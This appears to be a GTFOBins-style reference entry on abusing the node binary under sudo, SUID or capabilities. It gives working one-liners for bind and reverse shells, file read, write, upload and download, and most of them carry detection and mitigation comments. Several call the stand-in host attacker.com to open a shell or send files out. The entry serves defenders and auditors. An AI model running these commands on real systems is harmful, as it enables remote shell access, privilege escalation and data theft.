node

Bind Shell

Context: sudo, suid, unprivileged

# Spawns one /bin/sh child, then opens a TCP server on port 12345 and wires
# every accepted socket to that shell: socket -> stdin, stdout/stderr -> socket.
# listen() gets no host argument, so Node binds the unspecified address (all
# interfaces), and the code performs no authentication of the client.
# Detection: a `node -e` process that owns a listening socket and has /bin/sh
# as a child. Mitigation: do not grant sudo or the SUID bit on node, since
# -e executes arbitrary JavaScript; filter inbound ports on the host.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) {
  client.pipe(sh.stdin);
  sh.stdout.pipe(client);
  sh.stderr.pipe(client);
}).listen(12345)'

Download

Context: sudo, suid, unprivileged

# Issues an HTTP GET and streams the response body into a local file.
# The URL is plain http:// and the code checks neither the status code nor
# the integrity of what it writes. The write happens with the credentials of
# the node process, so under sudo/SUID the output path can be one the invoking
# user cannot normally write.
# Detection: `node -e` making an outbound HTTP request followed by a file
# create/modify event. Mitigation: egress filtering or a proxy allow-list,
# and no sudo/SUID grant on node.
node -e 'require("http").get("http://attacker.com/path/to/input-file", res => res.pipe(require("fs").createWriteStream("/path/to/output-file")))'

File Read

Context: sudo, suid, unprivileged

# Reads the whole input file with readFileSync (no encoding, so raw bytes)
# and writes it unchanged to stdout. The read is performed with the
# credentials of the node process, so under sudo/SUID it is not limited by
# the file permissions that apply to the invoking user.
# Detection: file-access auditing on sensitive paths, attributing opens to a
# node process started with -e. Mitigation: a sudoers entry for node cannot
# be scoped to "safe" scripts while -e is available; avoid granting it.
node -e 'process.stdout.write(require("fs").readFileSync("/path/to/input-file"))'

File Write

Context: sudo, suid, unprivileged

# Writes the literal string "DATA" to the output path with writeFileSync,
# which by default creates the file or truncates an existing one.
# The write uses the credentials of the node process, so under sudo/SUID it
# can replace files the invoking user cannot normally modify.
# Detection: file-integrity monitoring on configuration and credential files,
# correlated with a `node -e` writer. Mitigation: no sudo/SUID grant on node.
node -e 'require("fs").writeFileSync("/path/to/output-file", "DATA")'

Reverse Shell

Context: sudo, suid, unprivileged

# Spawns /bin/sh, then opens an outbound TCP connection to attacker.com on
# port 12345. Inside the connect callback `this` is the socket: it is piped
# into the shell's stdin, and the shell's stdout and stderr are piped back.
# The traffic is unencrypted, and because the connection is outbound, inbound
# firewall rules alone do not stop it.
# Detection: a `node -e` process with /bin/sh as a child and an established
# outbound TCP connection to an unexpected destination. Mitigation: default-
# deny egress from servers, and no sudo/SUID grant on node.
node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").connect(12345, "attacker.com", function () {
  this.pipe(sh.stdin);
  sh.stdout.pipe(this);
  sh.stderr.pipe(this);
})'

Shell

Context: capabilities, sudo, suid, unprivileged

# Spawns /bin/sh with stdio: [0, 1, 2], i.e. the child is handed node's own
# stdin, stdout and stderr descriptors, so the shell is interactive on the
# invoking terminal. The child is started with the credentials node is
# running with; whether /bin/sh keeps an elevated effective UID depends on
# the shell implementation (verify on the target distribution).
# Detection: process-tree telemetry showing sudo or a SUID node binary as the
# parent of /bin/sh. Mitigation: remove node from sudoers, and audit for SUID
# bits or file capabilities set on the node binary.
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'

Upload

Context: sudo, suid, unprivileged

# Opens the input file as a read stream and pipes it into an outgoing HTTP
# request, so the file contents leave the host as the request body.
# The URL is plain http://, and the file is read with the credentials of the
# node process (elevated under sudo/SUID).
# Detection: `node -e` reading a sensitive path and then opening an outbound
# HTTP connection; proxy or netflow logs showing request bodies sent to an
# unknown host. Mitigation: egress allow-listing, and no sudo/SUID grant on
# node.
node -e 'require("fs").createReadStream("/path/to/input-file").pipe(require("http").request("http://attacker.com/path/to/output-file"))'